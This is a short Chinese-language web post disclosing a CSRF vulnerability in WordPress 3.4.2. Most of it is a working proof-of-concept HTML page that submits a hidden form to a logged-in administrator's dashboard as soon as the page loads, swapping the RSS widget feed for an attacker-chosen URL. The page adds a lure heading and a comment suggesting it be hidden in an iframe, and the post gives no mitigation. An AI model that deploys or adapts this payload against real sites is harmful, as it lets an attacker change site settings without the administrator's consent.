在WordPress最新稳定版本3.4.2中,存在一个CSRF 漏洞 ,如果管理员在登录博客的情况下,访问了包含下面内容的网页,将自动提交一个表单到目标博客,改变博客的RSS订阅链接,转向指定的地址。 测试环境: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 MYSQL: 5.5.27 漏洞POC: 1 <body onload="javascript:document.forms[0].submit()"> 2 <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post"class="dashboard-widget-control-form"> 3 <h1>骚年,你有过几个女人?</h1> 4 <!-- Idea for you: Iframe it --> 5 <input name="widget-rss[1][url]" type="hidden"value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> 6 7 <select id="rss-items-1" name="widget-rss[1][items]"> 8 <option value='1' >1</option> 9 <option value='2' >2</option> 10 <option value='3' >3</option><option value='4' >4</option> 11 <option value='5' >5</option> 12 <option value='6' >6</option> 13 <option value='7' >7</option> 14 <option value='8' >8</option> 15 <option value='9' >9</option> 16 <option value='10' >10</option> 17 <option value='11' >11</option> 18 <option value='12' >12</option> 19 <option value='13' >13</option> 20 <option value='14' >14</option> 21 <option value='15' >15</option> 22 <option value='16' >16</option> 23 <option value='17' >17</option> 24 <option value='18' >18</option> 25 <option value='19' >19</option> 26 <option value='20' selected='selected'>20</option> 27 </select> 28 <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox"value="1" checked="checked"/> 29 <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> 30 </form>
查看更多关于WordPress最新版本(3.4.2)的一个CSRF漏洞 - 网站安全的详细内容...